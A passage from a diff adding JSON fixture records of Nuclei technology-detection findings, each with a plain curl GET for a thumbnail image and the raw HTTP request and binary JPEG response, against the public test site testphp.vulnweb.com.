href='http://blog.mindedsecurity.com/2009/05/client-side-http-parameter-pollution.html'>Original article</a>", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 290, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "nginx", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36' 'http://testphp.vulnweb.com/pictures/2.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/2.jpg.tn", + "discovered_date": "2024-11-13T02:35:00.908Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/2.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 1353\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:34:59 GMT\r\nEtag: "4dca64a1-549"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001a\u0002\u0003\u0001\u0001\u0002\u0001\u0003\u0004\u0005\u0006��+\u0010\u0002\u0002\u0001\u0004\u0002\u0002\u0004\u0007\u0001\u0002\u0011\u0003\u0004\u0012!1AQ"a\u00142q�\u0005\u0013$B�����\u001b\u0001\u0002\u0003\u0001\u0001\u0001\u0003\u0001\u0002\u0004\u0005\u0006\u0007��'\u0011\u0002\u0002\u0001\u0004\u0002\u0002\u0001\u0005\u0001\u0001\u0002\u0011\u0003\u0004\u0012!1\u0005Q\u00132A"#3aq���\f\u0003\u0001\u0002\u0011\u0003\u0011?���d�H䏺JU�\t\u000f\b�i{\u0015+f�.7<������B6�˨����͒\u001bdס\u001a�i�E�n�_��%\u001atN\f�pR�H\u001d�,֝�\u0001 \u0014@'DQ\u0003Qu?b�-\u0010\u0005�L\t-\u0005�\u0001��\fH�'A\u0015F�\u001a�ʔ?z3G�^�|����b�#����K�)�ۓ�l�%��"䨤�\u001f�u\u0015Ed44�2\u0005�S�D\u0002Y\u0005F�`H\u0001\r\u0011L`"�)4(\fF�,�����\u0003%C�9��1F�$�c$��\u000f�~�Q_�ק{c'K�#��r|�R��(�Ԥ�I}#;��k�ʚ��ϳf���EmZ\u0010��\u0012Kȶ�А��C\u0001Z\u001a�B�\u0006Ҵ1I\n\u0004�X�\u001com�\u0004�,�7\u000e�}�\\1�,�\u001f\u0017��#�wG�ϫ�\u0016���dPf�<\u0013�K��G�4j��\u001c�i�$���a���j�4C\u000b���g�8�`�.�Μy)�N��?��j��\u001a�*�w\u0016�����),\u0012�5b����/�g%��[7e�b�\u001a�/�$�fiƎ֛3�����Х�5b�ޥ�@%Ţ\b\u0019v\u0014E\u0012M�(�\u0018\b�w1h��(���\u001e\u001a7��C\u001c���_�\f{,��َ[]��kp��p}\u001d?ĹI��'�&�jq���0����WO����kV���}\u001bq�|�c]�q5\u0018��p\u0013�J�3��]Fhe�\u0018��K�4�%r}��W��à��d�h�}��-�\\��\u001c�E��+B�+^�4j��\u0004\u0010�}�\u0004\fN�qb�Qe?e`6�\u001b~Ȣې�6߲v��܄&��\u0014C��J�x�\n>njlԑ��5CEY�3��j=�\nʱ��եj�б�N����f�p���k3��Ҿ�9���}3t���ψ�2J4�N\rvt���O��\u0018��>�q�%��\t��\u001fB��e�\u001bJ�\u001e�QM"(�»^,]�e\\FG2k�WAC�\r��.�bPQf���t[^\tP��Σ�(���\u00126�6�YlJ&���I\u0013D<���d\u0017 \u0006��p2�\u000e��m%\u000e6���uc���V��}��\u001dl*⏝y�J\u0019�K�Nn�N\u0012x�䋤rr%`\u0006-W���\u0013���Ed(�\u0003!�����P�8��k��\u0005)�?,+���;5\u0012�\f2���+��\u0004��e�2�\t7�6-"v�\u0001f�d�&ͺXA���Sh~�\\�W���%O��r��c\u0014�\u0004>Ό\u001b�CHe\u0014\b��\u0007��", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 291, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "nginx", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/604.1' 'http://testphp.vulnweb.com/pictures/3.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/3.jpg.tn", + "discovered_date": "2024-11-13T02:35:00.994Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/3.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/604.1\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 3725\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:35:00 GMT\r\nEtag: "4dca64a1-e8d"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001c\u0001\u0004\u0003\u0001\u0001\u0002\u0003\u0004\u0005\u0006\u0007\b��2\u0010\u0002\u0001\u0003\u0003\u0003\u0003\u0003\u0003\u0003\u0004\u0003\u0001\u0002\u0003\u0004\u0011\u0005\u0012!\u00061A\u0013"Q\u00142a\u0007q�\u0015B�\b\u0016#3C����\u001b\u0001\u0001\u0005\u0001\u0001\u0002\u0003\u0005\u0006\u0007\u0001\u0004��2\u0011\u0001\u0003\u0003\u0002\u0003\u0005\u0007\u0004\u0003\u0001\u0002\u0003\u0004\u00111\u0005!\u0012\u0013A\u0014Qaq�\u0006"#����2���3R���\f\u0003\u0001\u0002\u0011\u0003\u0011?��W�z�M.�wow\n�C$\u0012��\u001b�2\t�\u0004\u001f��V���\u0013u\u001b;6���Ŏp6�I�l<����I$�\r���xU�/E�]���\u001b\u0018\u0002�\u0010I�8\u0002�_A��\u001f\t;7�^�J��\u0013^\u0006��MB��N�M�]�k\u001b0Ei�\b\u0019���54R$��\u001c�b��\u001c�����V�}���&�ng�\u001at���\u0010�V^�\u001eB7���܌��\u000b�д\u000bk\u0013!���#\u001a��\u001f��\u0017�\u0018��@\u001cq��x��C��2Xn����^W��9��,\u001a=J�\r\u0015��[�V��N�n./u\u0012�\\Or-�F���\u000b�\t����v\u001cg<F*\u0012��JYLR\rǟ�KST����E\u0014Q^e��c\f\u001aJy\u0019�+�\\�t8&�JF)+�h��(B(��\u0010�F))�)���M�QE\u0014%-#���<u|�q��,�\u000e\u0016(W�.�� �(9��!N\f̀�\u001d\u0002H����1��#��j�]��6\u001a��픆+�w\u0012D�\u0003�����G��u=\u000b�r�!D�4��p�5�\r��\n6����\u000eq��\u0003�6��h���ψq\u001e�\u001f�UA�k�J8/a��wS�6�\u0010�\u0015\u0002M�㴞\b����|V\u0011\u0014*\r�\u0011K���Υ�b�\u001a�����\u0015\u001c"�\u001c��\u0005\u0001�)9�\u0004\u00023��\u0003Vnt����,��\u0018\f�,�����\b����;�T\u0018#4�\u0003��$_��Lj�s\u001fτ�\u0003�5F�e}^�錛�˹Q�ܟݸn\\�2pI�\u000e\u0018��p�A\u001bD�$c+�\u001bP�\u000e�r�}�ی�2@�+E�X��l��I$�\\͈�1�\u0018.�\u0005���\u001cs�c\u0007�n�\u001f�\u0012K�Y�\u0017��\u000eO�6\u0001 \u0012pH\u001cx�5\u0013�hkj�����^�\u0003�і4�T��\u0019쥺{�B[�=�<\n\u0010 �\u001d�m9ov�y�\u0003�;�[Qm+�fԯ`\u0002HmIJB�\u0002\u0015����\u0001��8���\u00157�w���RH�/��nTz��\t��;C�\u000f\u0019\u0007;\\�����Ҽ��29\u0006H\u001bm�:)��{\u0014%�w��4\u000f�{�R�K\u001b�)R{���KA��y\u0019U)�� n%�p2ɮ���4gP�@%Cn�|���s\u001e���=\u0002���L�wH���\u0005Q���B�\u001carX�[�\u0018�^X�Z��\u000fy�R���n\u001e�\nѤ��$3����.s�d`�\r�U�\u0004��\u0011�1����\u000b�|�T\r\u000e���#��zӲ��dRm��-. �����x�`q��7WW�\u0019\u0004py�KTw���\u0015k�^&�\u0014dc�\u0015!\u0019�L#\u0014�\u0013�u�QE\u0015ĤS[�:���Rٔ�QEq8��\u0010x�>�\u0016ݣv{�J����wY\u000b��E@op\u0007\u001f4G4��,���J����YO��G�J�u1�p�\u0016�������:�]Һ��P����+i\u000b<\u0013�;�\u0002\n����c������2\u000b��m6+�\u0016�\u0019��\u0006H��2�\u0006�\u0002�\u0005H�H'#\f8��f�w��t���t�7���`��Z\u0003�����x\u0004�\f�q���ƈ+�|f�\u001e�R��@w����>$�2����h��P\u0010v��\u00078� \u000e\u000f\u001c5c���x`\u0019&\u0017b_�y \f\u00021�ry>\u0006\u0001���L~�麪J���:X��\u0018�2����l(,s�q��8�ߤ���^�]\t��\u0005e�\u0010\u0006��;�a�\u001d��L��g\u0015V��梮��45����c�u3Y<U\u0014�\u0010�\\G��(��\u0004S.S�v�)]�8?�T���U��6�g;U\u0007���\u0007�p+Ch?��eN�͂�z\\[\u000b\tV�=1\u0011f!��\u0018݁��+��O\u0003�\u0006Z����els\u001cq�����}�\u0003\u0005����\u0005\fFv��S�\u001dr�D��9��k���O\u0004!w˳n�\u0016*�\u0001��\u001d��\u0003�U5�uN�6�&�B�{i�h���e)\u0018dS��\u001e\t\u0019�\u00185\u001eA\u001b/{\\\u000e�EE<�0�\u001aE��������Er�a�$�\u0018���.�\u0015��(��u�$`\r7a��B\u0001MU\u0002�{=-�}�5^�q�(\\7)�3Y�#�5-\u001e?B�oRɑ����z���I]��;�v���TG����9��#A\u001e)��|f�6+���z]�\u0015�ݴ��͆��FSϴ��mĀ�\n\u0014}ÀvΐV��$��E��\b\u001d�d�z{�l0���A�\u0018\r��+�S�\u0015���̈:;U�\u0018��o�C\u001e��\fH\u0014�9�nq��\u001a��\\�Z\u0007�<c�\u001f\u001f�{�c\u0012�\u001er�\u001d�P�@��E\u001c��+�W�k�^?\u0004\u000f��S��M�\u00078=����Hc�y�� S#���\t��o�{)$g `�dR�-��b\u0002��\u001d(!^��L�\\�Z\u0005����J�,ņ\u0006;\fg����ߨ�a��ԗ\u001af�,Q�X��n�\u0004�%�9\u0019V�;�3�\u001cv[�k\u000b)�YA�����A�\u0019��\u000f��\u0016��\u001a���s~>�c{q$�4r\b�"�IȐ�<�Kc䚶�3Hǽ�5\r\u0016h�����Z�Ao���[WGu����jVs�(�}5�.^\u0010�\u00138bQ@]ː9<�}�kg�\u001f\u0007k.@8a�23��kJ�.��Ӭn.���P��E\n�\u001cl�\u0018����p�x>�ʫ)\u0015�A\u001b��Y$���Ycm�c�\u0018\\|g�{��Q��Բ�YL�X��\u0002�w/~�\u001c��:glz}n��\u0014����eWJ�n�\u0014QE\tK��S�?�\u001e���e��2�~����~(E�h��w���Tl�⤢�\u0003eRH�v��@�\u0004�3�\t<e~���W\b��vn\u0018n\u0001�y ��\u0012��G\u0016��)�6ޙ �������3\u001b��?\u0014�7\u0002\u0017�l��Դ�.QU��E�#�~8#8$g���ޑ-�^��Kp���aLͱG~\u0013;s�8�'�q\\�􃨮.\u0012]\u001a�帒\u0012\u001a\u0007 �H�\u0014�\u0003\u0001U��'�'\u001c\fV��j����Z��%\t\u001eb�Uf�;\u0010�X/%w0�9�k*�����4;���\u0015ޒx*!�:�\u0019X�n�^�%�\u0001�0�F�I��\u0018��8 \u001c��d2�\u0007���ŧY�a�8�t��Q\u0019db��\u0018��I\u0018�rN1��V8�\u0015�QD�Jv���\u001fUI������D�K[�qf���*�m\u0004�\u0019�?8�#=�Z����.��I�C��b��\u001c[��#ö<n\bW�\u0005��8 �9��6IP�\t���yq\u001c��7PA��=��\u0015�0 1�+s��2\u0006pO��*�9.����d��=R�d<��\\��\u001f��l���\u000f�ț,\be�q�8$v�<g�\u0017�y���M�ҭ�./�`N@P\u0019�\u0004�\u00120q�ۃ�v\u0016\u001b�"��Ťv2q���ѩ��\u001eI(��ez\u0017������F�(��$�(?ju\u0015�ۨ�~iʠS��Ⱥ\u0001 �RJŁ&��v���\u0005\u0001:\u000b��+������>U���ߐFA\u001eA"��D�V}C���\u0005\f���wo'��\u0019'i�T��|�������\u001c�CE֯�[�u�ʊ���H�ш�q�\u0016\\�\u001c3\f�j\u001fX�;|<,6p�|���ON���]���Wf�ڰ.�Vu \u0015�\u0006\u0016@G�9<\u001e���\u001d�����Giz�Ŕ:��ۥ���T��h��z��\u0006=�vFs�r\t�4�s^�7��Ý�\u0011�FW��>T�\ft�V$��O�[����\u0013\bcc#M\u0004�\u0019W����Gܮ\u001c��\n~r(i��jw\u0006\u0018Z<�/���F��x\u0007\u0004�b21��m�u�XZ�*�Fھ��ҰEM��$*������c���D}��RzE\u0003��H���a��\u001a�{�0���s����2�(��ך�\u00063ڢ����F�(��"�(�\b��(Bl�mEE\u0015Ġ�\u0006�'=袄���\u000e�w�j�wd�:�Y\u0018e%O(�ʜv�\u00020@5�:�6WWqDIX����q�E\u0015�n�\u0007����x�ߴ�+m6��e\nč#;rX�\u001e�I$��w�\u0006�\\0\u0017�7��U\u0003\r\u0018\u000b��\u0011��9\u0018�\u0004w�<`��Ⱦ$�/����*�rțö>�W��\u0013�O.�=�П�.�\u0004\u0001��c�Y!\n��Wv�v�\u0019e\u0007�\u0015��f��ӧ��mn����B������8ݑ�؁��<`��(�:��\u000f�L�Od�����1��igw|��)��\u0004��\u00078����;�98�@�E\u0015\u0017�1���E�\u001f`�����\u0002�}���", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 292, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "nginx", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6,2 Safari/605.1.15' 'http://testphp.vulnweb.com/pictures/4.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/4.jpg.tn", + "discovered_date": "2024-11-13T02:35:01.103Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/4.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6,2 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 4615\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:35:00 GMT\r\nEtag: "4dca64a1-1207"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001c\u0002\u0003\u0001\u0001\u0001\u0001\u0004\u0005\u0003\u0006\u0002\u0001\u0007\b��5\u0010\u0002\u0002\u0001\u0003\u0003\u0002\u0005\u0002\u0005\u0003\u0005\u0001\u0001\u0002\u0003\u0011\u0004\u0012!\u00051A\u0013Q\u0006"aq�\u0014�#2B��R��%3���b��\u001a\u0001\u0002\u0003\u0001\u0001\u0001\u0003\u0002\u0005\u0004\u0006��0\u0011\u0002\u0002\u0001\u0003\u0001\u0006\u0005\u0003\u0005\u0001\u0001\u0002\u0003\u0011\u0012!1A\u0004\u0013"2Qq\u0005a���3��\u0014#Rb����\f\u0003\u0001\u0002\u0011\u0003\u0011?K4�5���\u001d�Ô\u0012I�?�#Y6��^�s`\u001f��# 2�#Ag��&V\u0016\u000f���:����'���02t��>\u001cnX3P�W��s��D�-���#�&8�3���q�\u0011�A�4\t�����0+���F�!�4�"��#�)c�\u0002�\u001b�zTZ��Wo\u0015�<s\r��\u00159D��&�\tRտ��\u000b�kZ$�������Z��>�{�rB�2�]�U]�wy \u001f\u001d���\u0010~�\r\u0006�K��ۊ�k�~����8\u000f��~fI\t\u001b�\u0015D\u001e���\u001d<�+\u0014(�v\u0002�j\u0003�?(Xi�|��RZ\u001e�C��o�.\u001e)w ! 3n\u000b�\u0013E���agU˔#BX�\u0002����=M���\u001a�}�\u0006�\u0002�=��\u001c��ca̭I���!�\u0003�N�Y�\u0019�0UdK��\b'��U����m��^>�Q��\u0012*��Q�\u000f\u001ac\u001c�\u0005�F���*�\\�4����ՆP\u0007<~t��U\u0014�2�<�gz��\u000f$Y���e�\u0006�?3\u0003�\n<v���X\u000e`U,p&�7�C\u0017�cW\u0006hP3/��[=�?�f\u001aL���"��ʑ��r�,�\u0015�*�\b.�"�$�\u0016{�\u0018="l����v��l�<�U#��I�r�x��ֶ�/�A�\u0015�C� BĒhj�-�g����\u0007�Г4���CL�\u0018\b��(�h�\u000by\u001c�B�\u0017�f&<pƱ�\u001a�(��(\u0001�5\\*\u0005\n�q�:��\u001bE\u0016&\\�����Q�\u0013�utg��}����\u0003��\u0019?��\t\u0014��@�\u001e,�����鼓n]/���U܄���Z\u0007��:[�ԃdK\u0004��e'bHl���s]������:\u000e�\u001c�ގ�9�?��U\u0010�)���:�\u0003+P\u0004��aF�X�<\u001b≩��0A��\u0003��X]O!�\u001a\u0003���A�H����6���{\u001f�T6�Ǭgvl�\u001e�[���X\u001c����\u0007=���o�M��/}f����W�\bn��8���\u0016"I�/A\u001b\u0005�������<��uy"R�ŀ���������\n\u001cԺ�t���,孨\u0011�P�A�\r��\u001a+3;ч��F;T{��[�����\u0016�V�6�uL��e��\nۈ,YX���?��N:.*b@����Q5}�������\u0007Ցi��}�������\n;��ד�h��/�Ӂ���9hw\u001f[���\\\\92_w��\u0010��\u0018�\u000b��\u001f�'��w3��8\u0001Yop\u0006ڂ�l�+C���:��r�t`zLV�A�|\u001f�\u0003��\u0002;\u0017�D�mm���\f̾���@�B7)��2�H��Ǜ�\\\u0011VF�};�'��L*@ۈV4O�ߑu��p1��ُ\u0018E�hw>��?]<��\u001fM\u0010�L�f�Sa\fƌ\n}t|_���15F����\u000e�\u0015\u000fSD\u001d^�\\��\t(\u001cX�j�:�:�\f�\u0018�y\u0007]�\u001fm#��`��S#*\b�@f\u000e�\u0015_sΪ\u001dy^L��\t�1Ŵ���k�7|7\u0015|}E���#3�#29�r8`{Q�΢\u000f�!�F$e۸�\u0018Ճ��<w\u0014k��uFN\u0013㱓\r�Ѱ��\u001d��·l�U&�r=��GϿ���ͦ�4�:�9�C���O��\u0015Z\u0012|�\\�$�\u0016b\u0015bI \n\u001c���^uT��f!��!�V��Uoɮkށ5�\u001e�\t�W�3(,�~`�F������k,���o4��r80����3��7Uλ���\u0015\u0001��;�\u001et�ى�����\b>ڂ^E����M�����@\u001as�=ŘC�\u0001�(�p�˘ϐ���)��"�<�0�z�7ȡ����yI\u0004b��{��8c��s=%A�&h�u�-�\u0001���3��f�\u0011���k�#��\b\u001d�滊҈D��z��+���O��cP\u0007a�x\u001fm<3Y��g�%\u001b�������"a,�|���k\u001e\u0001�kM�\u0015h\u000eݴ�\u0019UG}^z�\u0011r�(\u001e�k���\u0014N&f���4p����`<��.\u000f�Rf\u000b\u001cr��LE��\u0004w�a�\u0013;�d�$X�\u0018�o�($���A\u001e���\\���t��[��q'P�\u0014/,����I�\u001a\u001e_�q��#74I`E-{�?��F�\u0011|?��\u001eJL\u0015\f��.@!d\u0003�\u0006���oO��me��t��1���8 �5�>��~u\u0001c�B�93����pS\u0019\b���\u0003nu䊢;P����S'&N��2"���\u0006W��G�<��\u0011‚ǎIZ�l?��\u000f\u001b\u0010�\u0005YV�c\fB�\u0015��\u001am�Ӡ�%H�DU�ÿ���\r$�dր�D��bu\u0003�,�2\u001c��匨X���!,�\u0018�\u0017d\u0011\\�\u001ac��\u001b����dIe�(\u001fP�IT�qUVŅ�<\u000f�:�E\n�8�H�x�Um+�\u0006֟���p�_P�'�#��\u001a\u0007*e�9\u0004r\u0015\u000e�[k0��}�P~�L�V'\u00042���<��A�v��H}x��\u0013_�����\u0019L�B��X��B\u0014\u0005RV@K\u0012�KpG�\u000bDrh��3ʞN�xZ�����\u0006��VyY�o�w\u0010\u0016��\u001a�\u0011L�"���\u0005\u0004�s��s�>�y�m6���8��K0�"X��[Q�\u0016\u000bE�$�#q�g�\u001ck±�Ħ�*�һ�\fy#m\u000e,7�6\u0001��}#�\u001c���,����U��6ڀ���FGs��8\u001bZ�Zڋ�t�\u0017�,�\u001a��z�Wj7���UR��s@�\u000e\u0015\u0012\f�A�j����\u0013,H;�%\n��\u0016,_o���^��]�0�G�6��\u0014�n�\u001d�:�*_\\��1y�|��\u0004aM�v�F�B�_j��(�\u0006��o^���\\\r�����23\u001e�e�\u001d\u0013p\u0004�\u0004�\u0007�<\u000f�\u001a�3�$\u0003���\u0007��m\u0005�\u001cKF�>羝c\u0015\u0015ڵ���'\u0013\u001e��v\\�� �͖�䊾�(�<��8}\u000e\u0012�g&m����#��\u001f�����u��4Ǒx�N\u0015/]�s��\u000e�ohN/O�y1!n9e��7�\u0018�(�\u0006�Ǖ}��a\f����\u0004��a\n\u0001㶎�@ \u001f���ƍ��\u0007Τ���\u0017�\u0010@�18��\u001d\u0017\u001bX\u001e�BH\\c������܂4B\u001e~�\\։\u0004��?MP��I\r��ݹ��z���I� wfc�\u0015\u0014Y��@{\u0001��4ר.Yp�4E\n#�V$|�\u001bo4l]\u001e;���̼KT2wT��\u0013�\u001b?1���\u001e\u0007�IuR<+7������!{\u0010O�\u0013\u000e�3Y\u0016D�cb\u0003�a[�\u0018X\u0006��\u0001�ڹ\u00122[a�\u0007������\u000e\\,eґAU!@�߸\u001c�7ި{k\u000f��}Y����٢�\f\u0018ϰ|\u000f��_\u000f┃\u001f�ފ%\rD_'r��\u0004W\u0017ߛ�1�\u001bu\u0015�̝�(��]�T\u0016�l��Ln��\u0015Wܒöc#v8�9m\\��\u001bQ�Bֈ�]��^�9\u0001�.ϕ���N�ş��ן���l�&����p72��ܮ\t\u001f�T��n;\\M\u0005&�er�\u0006�E�n�Q<v<X44:\u0002Ɖ�{��h�@G��U��Q���1�O�Y�u��0ر\u0016p7\u001d���^O���������^�WƂ�,�N�N��I�L�:�%\t��������d\t�\fL���P�\u001d\u0016\u001c�#\r1eC`m\u000bb��U���ǁE&&zez���\u0018(P�[�\u001b6�7F����p5~\u0014��\u0001FR=��|`\rk�T��e�h�>/�H�}Y\\��qH�G�\u0001~/p�o����&���\u001a)V4�\u0004J�\u000e��\u0018�E\n<��^�ֆ\b�\u0003�\u001d\f �����̯~O L�?W��#�VV�f�dJ2P;��;�U\n�Y���:�x\u001d>6�7�-��V2ށ,F�7\u000f��أ}�j#�R;\r\\�>\u0016]�1�p<��>�w��1\f\u001f\u0015��4%�\u001e�V(��捀A\u0006��{���\u001f�P�\u000e>T�\u0015�r\u0002:�b�\u00057`\u001e\t����ӡb��#GUz�\u000e�h\n\u0003m�\u0001�@d�\u001b�4\u00016��x�<J\u0002�c�)a`\u001a&�w��\t\u0001����~ M�n�u����3�{\u001a\u0004�{���Lq��,��\\�\t��SI�S{\u001b�G�\u000f���|;!�\u0010���&r.�*�T[\u000e~m�h_��F�\u001d\u0003��VwM��9�I�4��ƕ\u0003!<w#m��}��\u0016\u000eO"@�zϞ�<p#3��)=\\�\tP���[���0�!\f��#J״�`S�<|��W�1�ۜ�H",h*�:S)}��u�b�p����D#\u0001{�\u001a��B�\u0006�;��4X�\u000b~M\u0002k�\u000e�?O���6@BѻF�\u001c:�5`�D\u001a���m\u0005�\n�H��\u0003w\u0002�����bj\\�\u0007��t��]���x�Z3HСD%����T�\u0017B�\u001e��v��\u0002��[�B>cc�u�P�|���˃d����\u0015����\u0016@;\u001et���I q���\u001c|���J���CL��1�%@�B��\b\u0004�5�\u001b\u0017V<�8��#�Q\u001364�E#Fɹ\u0018���k\u000e<\u0010H#�$jΒޤ~���S�������Z�:\u000f\u001d'5����zs;�Ӥ��6�\r\u0015$i�⤠nE?q���sK\u0019h\u0018�( �5d]_﫺fw�L\u0019$�k�G�\\��ЧO��m�1�����\u000e��H���\n��x\u0004]�}���<���$0ώ��\u0010�B7314\u0015Tr����c�j���\u001aJ�]A\u0017tG�\u0007L����s�嶰g�8��W\u001f"F�\\\t\u0013�S��_c�:���GYy�\u0002z��\u0011;U���\u0001I��]�w�گ�d�t��Xs\u001d�fW��\u001c���x\u0004X�/�W����D\u0005\u0015�C7�U����p+β]\u001b�<l�}Rޒ\u000b�C]�\u0007����@�bN�"20e"�\u0006�\u001a� �\u0014�T��\u0011�>8�\b�����������Q��\u0010N�;�\u001a�b\u0007ƺQgV��^5�e�B\u0004��Ƞ\u001e5��$�Ա�؟I�\u0012\u0001�������u�_���\u001d��~�\u0018Ѫ��Ҝh���1�A\u0013�\u001bA�����/����_�U�cV��\u0007�m_�\u00188S�@����SSUn\u001b��p>Oβ�\u0001���3�\u000fU����\ba�\\��SSV>E�J�����,u\u0006���:�\u001cO\u0003�\u00048B������Ӝef}$�\u0006=e�\tf˗��Z�m���ε���\u001a��)�\u0010\\1a\u0002\u001f\u0012�;k��\u0018��\b�����ՌX�ez�\u0004\u0011u���������=F\u0006�,\u001d��\u0004�菅sr'N�,�10亠�Ty�ۏmMM$y�='[oW��3W��T��}'\u001f+$ ��$( p�{�5���ښ�a�r�&\u0018�ͫ�󩩮\u000ba\u0013��", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 293, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": 